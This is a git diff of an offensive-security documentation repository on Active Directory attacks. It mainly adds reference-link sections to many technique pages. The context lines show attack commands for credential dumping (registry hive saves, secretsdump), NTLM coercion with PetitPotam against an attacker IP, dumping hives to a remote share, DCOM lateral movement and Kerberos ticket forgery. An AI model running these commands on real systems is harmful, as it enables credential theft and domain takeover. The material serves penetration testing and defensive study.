Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/) +* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) +* [AD CS/PKI template exploit via PetitPotam and NTLMRelayx, from 0 to DomainAdmin in 4 steps by frank | Jul 23, 2021](https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/) +* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) +* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) +* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) +* [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) +* [UnPAC the hash - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash) +* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/) +* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) +* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) +* [Certificates and Pwnage and Patches, Oh My! - Will Schroeder - Nov 9, 2022](https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d) +* [Certificate templates - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/certificate-templates) +* [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration) +* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) +* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) \ No newline at end of file diff --git a/docs/active-directory/ad-adds-acl-ace.md b/docs/active-directory/ad-adds-acl-ace.md index 952a6d9..1737782 100644 --- a/docs/active-directory/ad-adds-acl-ace.md +++ b/docs/active-directory/ad-adds-acl-ace.md @@ -205,4 +205,11 @@ rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user # Using bloodyAD with pass-the-hash bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd -``` \ No newline at end of file +``` + + +## References + +* [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/) +* [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces) +* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) \ No newline at end of file diff --git a/docs/active-directory/ad-adds-dumping-ntds.md b/docs/active-directory/ad-adds-dumping-ntds.md index b343cee..3c3d5a6 100644 --- a/docs/active-directory/ad-adds-dumping-ntds.md +++ b/docs/active-directory/ad-adds-dumping-ntds.md @@ -123,3 +123,9 @@ This means the hashes can be trivially reversed to the cleartext values, hence t ``` The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT. + + +## References + +* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) +* [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/) diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index 0162863..12a1fd1 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -302,4 +302,20 @@ You can remotely query every machines on the network to get a list of the users' gpresult /r $Env:LOGONSERVER echo %LOGONSERVER% - ``` \ No newline at end of file + ``` + + +## References + +* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) +* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/) +* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/) +* [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/) +* [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/) +* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/) +* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/) +* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/) +* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) +* [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/) +* [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/) +* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) diff --git a/docs/active-directory/ad-adds-group-policy-objects.md b/docs/active-directory/ad-adds-group-policy-objects.md index b1e3631..74cd504 100644 --- a/docs/active-directory/ad-adds-group-policy-objects.md +++ b/docs/active-directory/ad-adds-group-policy-objects.md @@ -103,4 +103,13 @@ StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivil # Execute a custom command StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK\Administrator" --command "C:\I\do\the\thing.exe" --args "with args" -``` \ No newline at end of file +``` + + +## References + +* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/) +* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/) +* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) +* [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/) +* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) \ No newline at end of file diff --git a/docs/active-directory/ad-adds-groups.md b/docs/active-directory/ad-adds-groups.md index 6096af7..d617616 100644 --- a/docs/active-directory/ad-adds-groups.md +++ b/docs/active-directory/ad-adds-groups.md @@ -109,4 +109,10 @@ This groups grants the following privileges : ``` * Retrieve SAM,SECURITY and SYSTEM hives * [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\` - * [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK` \ No newline at end of file + * [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK` + + +## References + +* [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/) +* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) \ No newline at end of file diff --git a/docs/active-directory/ad-adds-linux.md b/docs/active-directory/ad-adds-linux.md index 36f951b..29b1ee7 100644 --- a/docs/active-directory/ad-adds-linux.md +++ b/docs/active-directory/ad-adds-linux.md @@ -129,3 +129,8 @@ De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_ ./sss_deobfuscate AAAQABagVAjf9KgUyIxTw3A+HUfbig7N1+L0qtY4xAULt2GYHFc1B3CBWGAE9ArooklBkpxQtROiyCGDQH+VzLHYmiIAAQID ``` + +## References + +* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html) +* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) \ No newline at end of file diff --git a/docs/active-directory/ad-adds-rodc.md b/docs/active-directory/ad-adds-rodc.md index 8d0cc58..fcc6b06 100644 --- a/docs/active-directory/ad-adds-rodc.md +++ b/docs/active-directory/ad-adds-rodc.md @@ -42,4 +42,11 @@ When you have one the following permissions to the RODC computer object: **Gener * Add a domain admin account to the RODC's **msDS-RevealOnDemandGroup** attribute ```ps1 PowerSploit> Set-DomainObject -Identity RODC$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')} - ``` \ No newline at end of file + ``` + + +## References + +* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) +* [At the Edge of Tier Zero: The Curious Case of the RODC - Elad Shamir](https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06) +* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) diff --git a/docs/active-directory/ad-adfs-federation-services.md b/docs/active-directory/ad-adfs-federation-services.md index 3ef9cbc..a07be95 100644 --- a/docs/active-directory/ad-adfs-federation-services.md +++ b/docs/active-directory/ad-adfs-federation-services.md @@ -40,3 +40,7 @@ Other interesting tools to exploit AD FS: * [WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) + +## References + +* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) \ No newline at end of file diff --git a/docs/active-directory/ad-deployment-sccm.md b/docs/active-directory/ad-deployment-sccm.md index d20a117..a7dafcf 100644 --- a/docs/active-directory/ad-deployment-sccm.md +++ b/docs/active-directory/ad-deployment-sccm.md @@ -101,4 +101,14 @@ From a remote machine. Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi - ``` \ No newline at end of file + ``` + + +## References + +* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) +* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) +* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/) +* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) +* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) +* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) \ No newline at end of file diff --git a/docs/active-directory/ad-integrated-dns.md b/docs/active-directory/ad-integrated-dns.md index 6490c0b..4573ad5 100644 --- a/docs/active-directory/ad-integrated-dns.md +++ b/docs/active-directory/ad-integrated-dns.md @@ -31,4 +31,11 @@ StandIn.exe --dns --limit 20 StandIn.exe --dns --filter SQL --limit 10 StandIn.exe --dns --forest --domain --user --pass StandIn.exe --dns --legacy --domain --user --pass -``` \ No newline at end of file +``` + + +## References + +* [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/) +* [ADIDNS Revisited – WPAD, GQBL, and More - December 5, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/) +* [Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS - July 10, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/) \ No newline at end of file diff --git a/docs/active-directory/ad-roasting-asrep.md b/docs/active-directory/ad-roasting-asrep.md index 1c3c9a7..c50730c 100644 --- a/docs/active-directory/ad-roasting-asrep.md +++ b/docs/active-directory/ad-roasting-asrep.md @@ -93,4 +93,10 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4- **Mitigations**: * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). -* Disable RC4 cipher if possible. \ No newline at end of file +* Disable RC4 cipher if possible. + + +# References + +* [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/) +* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) \ No newline at end of file diff --git a/docs/active-directory/ad-roasting-kerberoasting.md b/docs/active-directory/ad-roasting-kerberoasting.md index b569cbf..4fa6e8b 100644 --- a/docs/active-directory/ad-roasting-kerberoasting.md +++ b/docs/active-directory/ad-roasting-kerberoasting.md @@ -82,3 +82,11 @@ Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`) **Mitigations**: * Have a very long password for your accounts with SPNs (> 32 characters) * Make sure no users have SPNs + + +## References + +* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) +* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) +* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/) +* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) \ No newline at end of file diff --git a/docs/active-directory/ad-roasting-timeroasting.md b/docs/active-directory/ad-roasting-timeroasting.md index 4e4fab8..8e092c8 100644 --- a/docs/active-directory/ad-roasting-timeroasting.md +++ b/docs/active-directory/ad-roasting-timeroasting.md @@ -6,4 +6,10 @@ ```ps1 sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt hashcat -m 31300 ntp-hashes.txt - ``` \ No newline at end of file + ``` + + +## References + +* [Timeroasting: Attacking Trust Accounts in Active Directory - Tom Tervoort - 01 March 2023](https://www.secura.com/blog/timeroasting-attacking-trust-accounts-in-active-directory) +* [TIMEROASTING, TRUSTROASTING AND COMPUTER SPRAYING WHITE PAPER - Tom Tervoort](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf) \ No newline at end of file diff --git a/docs/active-directory/ad-tricks.md b/docs/active-directory/ad-tricks.md index 5eacc6f..81fd96a 100644 --- a/docs/active-directory/ad-tricks.md +++ b/docs/active-directory/ad-tricks.md @@ -22,4 +22,12 @@ In Kerberos, time is used to ensure that tickets are valid. To achieve this, the * Fix #2: Fake your clock ```ps1 faketime -f '+8h' date - ``` \ No newline at end of file + ``` + + +## References + +* [BUILDING AND ATTACKING AN ACTIVE DIRECTORY LAB WITH POWERSHELL - @myexploit2600 & @5ub34x](https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/) +* [Becoming Darth Sidious: Creating a Windows Domain (Active Directory) and hacking it - @chryzsh](https://chryzsh.gitbooks.io/darthsidious/content/building-a-lab/building-a-lab/building-a-small-lab.html) +* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) +* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) diff --git a/docs/active-directory/hash-capture.md b/docs/active-directory/hash-capture.md index e845803..93e8c43 100644 --- a/docs/active-directory/hash-capture.md +++ b/docs/active-directory/hash-capture.md @@ -89,3 +89,8 @@ Crack the hashes with Hashcat / John The Ripper john --format=netntlmv2 hash.txt hashcat -m 5600 -a 3 hash.txt ``` + + +## References + +* [NTLMv1_Downgrade.md - S3cur3Th1sSh1t - 09/07/2021](https://gist.github.com/S3cur3Th1sSh1t/0c017018c2000b1d5eddf2d6a194b7bb) \ No newline at end of file diff --git a/docs/active-directory/hash-pass-the-hash.md b/docs/active-directory/hash-pass-the-hash.md index c0df982..5a568de 100644 --- a/docs/active-directory/hash-pass-the-hash.md +++ b/docs/active-directory/hash-pass-the-hash.md @@ -35,4 +35,9 @@ C:\> reg.exe save hklm\sam c:\temp\sam.save C:\> reg.exe save hklm\security c:\temp\security.save C:\> reg.exe save hklm\system c:\temp\system.save $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL -``` \ No newline at end of file +``` + + +## References + +* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/) \ No newline at end of file diff --git a/docs/active-directory/internal-dcom.md b/docs/active-directory/internal-dcom.md index a946b75..dea68bd 100644 --- a/docs/active-directory/internal-dcom.md +++ b/docs/active-directory/internal-dcom.md @@ -110,4 +110,10 @@ $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\syst $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1") $obj = [System.Activator]::CreateInstance($com) $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) -``` \ No newline at end of file +``` + + +## References + +* [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/) +* [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques) \ No newline at end of file diff --git a/docs/active-directory/internal-mitm-relay.md b/docs/active-directory/internal-mitm-relay.md index b016af5..b847440 100644 --- a/docs/active-directory/internal-mitm-relay.md +++ b/docs/active-directory/internal-mitm-relay.md @@ -2,8 +2,8 @@ NTLMv1 and NTLMv2 can be relayed to connect to another machine. -| Hash | Hashcat | Attack method | -|---|---|---| +| Hash | Hashcat | Attack method | +|-----------------------|---------|----------------------| | LM | `3000` | crack/pass the hash | | NTLM/NTHash | `1000` | crack/pass the hash | | NTLMv1/Net-NTLMv1 | `5500` | crack/relay attack | @@ -272,4 +272,13 @@ pyrdp-mitm.py -k private_key.pem -c certificate.pem # with custom key and c * If NLA is disabled, you will obtain the password in plaintext * Other features are available such as keystroke recording * Alternatives - * S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener \ No newline at end of file + * S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener + + +## References + +* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) +* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) +* [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/) +* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) +* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) \ No newline at end of file diff --git a/docs/active-directory/internal-pxe-boot-image.md b/docs/active-directory/internal-pxe-boot-image.md index 06a6f3d..fd224f6 100644 --- a/docs/active-directory/internal-pxe-boot-image.md +++ b/docs/active-directory/internal-pxe-boot-image.md @@ -47,3 +47,9 @@ PXE allows a workstation to boot from the network by retrieving an operating sys >>>> >>>> UserID = MdtService >>>> >>>> UserPassword = Somepass1 ``` + + +## References + +* [Attacks Against Windows PXE Boot Images - February 13th, 2018 - Thomas Elling](https://blog.netspi.com/attacks-against-windows-pxe-boot-images/) +* [COMPROMISSION DES POSTES DE TRAVAIL GRÂCE À LAPS ET PXE MISC n° 103 - mai 2019 - Rémi Escourrou, Cyprien Oger ](https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE) \ No newline at end of file diff --git a/docs/active-directory/internal-shares.md b/docs/active-directory/internal-shares.md index 75bc366..377dfdf 100644 --- a/docs/active-directory/internal-shares.md +++ b/docs/active-directory/internal-shares.md @@ -163,4 +163,9 @@ IconIndex=1 \\\\workstation@8888\\folder -``` \ No newline at end of file +``` + + +## References + +* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) diff --git a/docs/active-directory/kerberos-bronze-bit.md b/docs/active-directory/kerberos-bronze-bit.md index 1cc88f0..8f31dec 100644 --- a/docs/active-directory/kerberos-bronze-bit.md +++ b/docs/active-directory/kerberos-bronze-bit.md @@ -48,4 +48,11 @@ python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate U # Load the ticket .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null -``` \ No newline at end of file +``` + + +## References + +* [CVE-2020-17049: Kerberos Bronze Bit Attack – Practical Exploitation - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/) +* [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/) +* [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory) \ No newline at end of file diff --git a/docs/active-directory/kerberos-delegation-rbcd.md b/docs/active-directory/kerberos-delegation-rbcd.md index 6bb4ae1..0375051 100644 --- a/docs/active-directory/kerberos-delegation-rbcd.md +++ b/docs/active-directory/kerberos-delegation-rbcd.md @@ -82,4 +82,10 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012. [*] Action: Import Ticket [+] Ticket successfully imported! - ``` \ No newline at end of file + ``` + + +## References + +* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) +* [A Case Study in Wagging the Dog: Computer Takeover - Will Schroeder - Feb 28, 2019](https://posts.specterops.io/a-case-study-in-wagging-the-dog-computer-takeover-2bcb7f94c783) \ No newline at end of file diff --git a/docs/active-directory/kerberos-delegation-unconstrained.md b/docs/active-directory/kerberos-delegation-unconstrained.md index 078e43d..7f1204c 100644 --- a/docs/active-directory/kerberos-delegation-unconstrained.md +++ b/docs/active-directory/kerberos-delegation-unconstrained.md @@ -116,4 +116,10 @@ python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP # Extract the ticket .\Rubeus.exe asktgs /ticket: /ptt -``` \ No newline at end of file +``` + + +## References + +* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/) +* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) \ No newline at end of file diff --git a/docs/active-directory/kerberos-s4u.md b/docs/active-directory/kerberos-s4u.md index 6a67b08..c1b441a 100644 --- a/docs/active-directory/kerberos-s4u.md +++ b/docs/active-directory/kerberos-s4u.md @@ -23,4 +23,10 @@ The "Network Service" account and the AppPool identities can act as the computer Rubeus.exe s4u /user:${computerAccount} /msdsspn:cifs/${computerDNS} /impersonateuser:${localAdmin} /ticket:${TGT} /nowrap # The service name is not included in the TGS ciphered data and can be modified at will. Rubeus.exe tgssub /ticket:${ticket} /altservice:cifs/${ServerDNSName} /ptt -``` \ No newline at end of file +``` + +## References + +* [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence) +* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse) +* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/) \ No newline at end of file diff --git a/docs/active-directory/kerberos-tickets.md b/docs/active-directory/kerberos-tickets.md index 7e8a346..82e2d70 100644 --- a/docs/active-directory/kerberos-tickets.md +++ b/docs/active-directory/kerberos-tickets.md @@ -179,4 +179,21 @@ Require: ```ps1 # baduser argument will be ignored ticketer.py -request -impersonate 'domain_adm' -domain 'lab.local' -user 'domain_user' -password 'password' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' 'baduser' -``` \ No newline at end of file +``` + + +## References + +* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/) +* [How Attackers Use Kerberos Silver Tickets to Exploit Systems - Sean Metcalf](https://adsecurity.org/?p=2011) +* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/) +* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond) +* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/) +* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) +* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html) +* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) \ No newline at end of file diff --git a/docs/active-directory/pwd-group-policy-preferences.md b/docs/active-directory/pwd-group-policy-preferences.md index 6bbef2b..4b7f061 100644 --- a/docs/active-directory/pwd-group-policy-preferences.md +++ b/docs/active-directory/pwd-group-policy-preferences.md @@ -50,3 +50,8 @@ echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aS * Install [KB2962486](https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-025) on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences. * Delete existing GPP xml files in SYSVOL containing passwords. * Don’t put passwords in files that are accessible by all authenticated users. + + +## References + +* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288) \ No newline at end of file diff --git a/docs/active-directory/pwd-precreated-computer.md b/docs/active-directory/pwd-precreated-computer.md index 8d9e0af..5b43991 100644 --- a/docs/active-directory/pwd-precreated-computer.md +++ b/docs/active-directory/pwd-precreated-computer.md @@ -10,3 +10,8 @@ djoin /PROVISION /DOMAIN /MACHINE evilpc /SAVEFILE C:\temp\evilpc.txt /DE * When you attempt to login using the credential you should have the following error code : `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`. * Then you need to change the password with [rpcchangepwd.py](https://github.com/SecureAuthCorp/impacket/pull/1304) + + +## References + +* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 